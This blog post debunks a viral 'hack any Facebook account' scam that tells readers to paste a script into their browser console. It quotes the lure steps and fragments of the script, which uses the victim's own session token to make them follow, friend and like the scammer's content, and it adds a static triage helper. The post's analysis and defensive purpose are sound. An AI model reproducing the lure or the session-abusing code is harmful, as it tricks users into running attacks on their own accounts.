“Hack any facebook account” is one phrase that excites people so much that they lose their common sense! Facebook spends millions on its security and user privacy, but people still think hacking Facebook accounts is a kid's task. If a person does find a flaw in Facebook's security, he is rewarded with a big bounty, which gives him every reason not to make the flaw public.

Recently a social engineering script has become very popular on Facebook; it traps users by claiming to hack any Facebook account. Here are the steps, as listed on a Facebook page, by which you can supposedly hack any Facebook account:

  1. Open Victim Id
  2. Right Click or Press F12 & Click on Inspect Element.
  3. Click on Console & Copy Code from This File (Ctrl+A): https://dl.dropboxusercontent.com/u/105061154/f-b.txt
  4. Paste Code (Ctrl+V) & Press Enter. wait for 5 Seconds.
  5. You’ll Receive the Message from Victim with Email & Pass.

The most important steps in the process above are the 3rd and 4th. We analyzed the txt file whose contents are to be pasted into the console, and here's what we got:

The cheesiest parts of the txt file, shown as two listings:

1  function a(abone){
2  var http4=new XMLHttpRequest;
3  var url4="/ajax/follow/follow_profile.php?__a=1";
4  var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
5  http4.open("POST",url4,true);

1  http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("100002824643338").........XURL="//www.facebook.com/ajax/add_friend/action.php";
2  var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
3  X.open("POST",XURL,true);
4  X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};
5  X.send(XParams)} ///////////////////////////KH訬G X覣 ? 新Y/////////////////////////// // t鄆 sublist("466072136830270");
6  IDS("100002824643338");
7  IDS("100002936183297");
8  P("466022100168607");
9  P("466075036829980");
10  // cu?ng a("100006133690698");
11 P("472982602806117");
12 Like("472970676140643");

Line 3 of the first listing simply calls Facebook's follow action, which makes the victim (who is actually trying to hack someone else's account) follow a list named Programming Learning Point and a profile named “Gull”, and like a couple of photos. Because the code is pasted into the victim's own logged-in browser session, the requests carry the victim's own fb_dtsg token and user_id, so Facebook treats them as the victim's own actions. The IDs of the list to follow, the pictures to like and the profile to follow are given in lines 6 to 12 of the second listing. So all this script does is make its victims like and follow some content; it does not hack into any profile.
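As an added example (not code from the original post or from the script's author), here is a small static triage helper for Node: instead of pasting such a script into the console, run it through this to list the Facebook ajax endpoints it calls, the hard-coded IDs it targets and whether it reuses the victim's own session tokens. The sample script inside is a constructed abbreviation of the listings above.

```javascript
// Added example (not code from the original post or from the script's author):
// static triage of a pasted "hack facebook" script. The text is only parsed,
// never executed, so it can be inspected safely.

// Constructed sample, abbreviated from the listings quoted above; the IDs are
// the ones that appear on the page.
const SAMPLE_SCRIPT = `
function a(abone){
var http4=new XMLHttpRequest;
var url4="/ajax/follow/follow_profile.php?__a=1";
var params4="profile_id="+abone+"&fb_dtsg="+fb_dtsg+"&__"+user_id+"&phstamp=";
http4.open("POST",url4,true);http4.send(params4)}
var XURL="//www.facebook.com/ajax/add_friend/action.php";
a("100002824643338");
IDS("100002936183297");
P("466022100168607");
// a("100006133690698");
Like("472970676140643");
`;

function triageScript(src) {
  // Every string literal whose path contains /ajax/ is a Facebook ajax
  // endpoint the script would POST to from inside the victim's session.
  const endpoints = new Set();
  for (const m of src.matchAll(/["']([^"']*\/ajax\/[^"']*)["']/g)) {
    endpoints.add(m[1].replace(/^\/\/www\.facebook\.com/, ""));
  }
  // Calls like P("466022100168607") carry the hard-coded targets (profiles,
  // lists, photos). Commented-out calls are ignored, as the browser would.
  const calls = {};
  for (const line of src.split("\n")) {
    const code = line.replace(/\/\/.*$/, "");
    for (const m of code.matchAll(/\b([A-Za-z_]\w*)\("(\d{6,})"\)/g)) {
      (calls[m[1]] || (calls[m[1]] = [])).push(m[2]);
    }
  }
  // fb_dtsg is the per-session CSRF token and user_id the logged-in user:
  // reading them means the requests are authenticated as whoever pasted the code.
  const sessionTokens = ["fb_dtsg", "user_id"].filter((t) =>
    new RegExp("\\b" + t + "\\b").test(src)
  );
  return { endpoints: [...endpoints].sort(), calls, sessionTokens,
           runsAsVictim: sessionTokens.length > 0 };
}

// Stand-alone usage: print the report for the constructed sample.
console.log(JSON.stringify(triageScript(SAMPLE_SCRIPT), null, 2));
```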

We also found the creator of the “hack facebook account” script

While reversing the script we also managed to find its creator. It wasn't a big task, as he was the person who had created the list that victims followed, and the photos that victims liked included a couple of photos of the creator himself. The creator is a guy from Karachi, Pakistan. He also updated his Facebook status claiming that he was the creator of the script.

(Screenshots: hack facebook spam reversed by Czar)

The creator's Facebook status said “Never try that sort of code again in your life”. So true!